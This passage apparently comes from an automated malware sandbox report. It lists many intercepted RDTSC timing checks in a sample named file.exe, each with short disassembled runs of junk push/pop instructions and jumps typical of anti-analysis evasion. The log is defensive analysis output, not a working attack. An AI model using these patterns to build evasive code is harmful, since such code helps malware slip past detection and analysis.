                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7579 second address: CF75B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F6398F5ECB5h 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F6398F5EC96h 0x00000014 ja 00007F6398F5EC96h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7843 second address: CF7849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7849 second address: CF784D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF784D second address: CF7878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F6398F5B4AFh 0x0000000e jmp 00007F6398F5B4A9h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7878 second address: CF787C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7AFE second address: CF7B25 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6398F5B496h 0x00000008 jmp 00007F6398F5B4A9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7B25 second address: CF7B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6398F5EC9Eh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7B3B second address: CF7B45 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6398F5B496h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7B45 second address: CF7B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F6398F5EC9Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7B53 second address: CF7B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6398F5B4A7h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6398F5B4A1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7B85 second address: CF7B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7B89 second address: CF7BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B4A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7BAC second address: CF7BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5ECA9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7E7C second address: CF7E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6B97 second address: CF6BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6398F5EC96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6BA1 second address: CF6BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B49Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6398F5B4A0h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0021E second address: D00254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5EC9Dh 0x00000009 jbe 00007F6398F5EC96h 0x0000000f jmp 00007F6398F5ECA6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007F6398F5EC96h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00254 second address: D0026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F6398F5B496h 0x00000010 jng 00007F6398F5B496h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0026A second address: D0028A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6398F5ECA6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0028A second address: D0028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D003A4 second address: D003AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D003AA second address: D003AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D003AE second address: D003D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F6398F5EC96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6398F5ECA3h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D003D5 second address: D003DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6398F5B496h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02F9B second address: D02F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02F9F second address: D02FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03110 second address: D03114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03114 second address: D0313B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6398F5B49Eh 0x0000000f jmp 00007F6398F5B49Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A0BB second address: D0A0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A0C1 second address: D0A0D6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6398F5B496h 0x00000008 js 00007F6398F5B496h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08AB4 second address: D08ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08ABA second address: D08AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08C17 second address: D08C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08C1B second address: D08C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6398F5B4A7h 0x0000000c jmp 00007F6398F5B4A1h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D2B0 second address: D0D2B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D2B5 second address: D0D2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6398F5B496h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D2C4 second address: D0D2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CB24 second address: D0CB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B4A7h 0x00000009 pop ebx 0x0000000a push edi 0x0000000b jmp 00007F6398F5B49Eh 0x00000010 jmp 00007F6398F5B4A1h 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CB61 second address: D0CB66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CB66 second address: D0CB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CCFA second address: D0CCFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CCFE second address: D0CD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10849 second address: D1084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1084F second address: D10857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10A06 second address: D10A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10A0B second address: D10A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10A13 second address: D10A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10A17 second address: D10A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10D27 second address: D10D67 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6398F5EC96h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6398F5ECA8h 0x00000011 push esi 0x00000012 jnc 00007F6398F5EC96h 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F6398F5EC9Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10D67 second address: D10D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F6F second address: D10F73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F73 second address: D10F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6398F5B49Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F8A second address: D10F90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F90 second address: D10F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F96 second address: D10F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10F9C second address: D10FC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6398F5B49Bh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19543 second address: D1958D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5EC9Dh 0x00000009 pop edi 0x0000000a jmp 00007F6398F5ECA4h 0x0000000f jmp 00007F6398F5ECA8h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jnl 00007F6398F5EC96h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1958D second address: D1959E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F6398F5B49Ah 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1959E second address: D195CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5ECA5h 0x00000009 jmp 00007F6398F5ECA7h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D180C2 second address: D180E7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6398F5B49Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F6398F5B496h 0x00000010 push eax 0x00000011 jmp 00007F6398F5B4A2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D180E7 second address: D18103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jns 00007F6398F5EC9Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18472 second address: D18491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B4A9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18491 second address: D1849C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1849C second address: D184A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18F1A second address: D18F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2023E second address: D20242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20242 second address: D20248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20248 second address: D2024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2024E second address: D2026F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5EC9Dh 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F6398F5EC96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2026F second address: D20289 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F6398F5B49Ah 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20289 second address: D2028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2028F second address: D20293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20293 second address: D202AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5ECA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D202AE second address: D202B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D202B2 second address: D202B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D234A9 second address: D234AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D234AD second address: D234B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D234B1 second address: D234C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6398F5B496h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D234C1 second address: D234D9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnl 00007F6398F5EC96h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D234D9 second address: D234E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23627 second address: D23631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6398F5EC96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23BAC second address: D23BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6398F5B496h 0x0000000a jmp 00007F6398F5B4A0h 0x0000000f popad 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 jne 00007F6398F5B496h 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23D3A second address: D23D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23D40 second address: D23D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EB2 second address: D23EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6398F5EC9Bh 0x0000000b jmp 00007F6398F5ECA6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EDC second address: D23EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EE4 second address: D23EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EE8 second address: D23EFC instructions: 0x00000000 rdtsc 0x00000002 je 00007F6398F5B496h 0x00000008 jbe 00007F6398F5B496h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EFC second address: D23F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AE3A second address: D2AE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B4AC second address: D2B4B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B4B2 second address: D2B4BC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6398F5B4A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B4BC second address: D2B4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6398F5EC96h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6398F5ECA8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B616 second address: D2B61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B61A second address: D2B624 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6398F5EC96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B624 second address: D2B632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6398F5B49Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C399 second address: D2C3B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5ECA1h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3B0 second address: D2C3B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3B6 second address: D2C3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3BC second address: D2C3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3C0 second address: D2C3C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3C4 second address: D2C3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3CE second address: D2C3D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
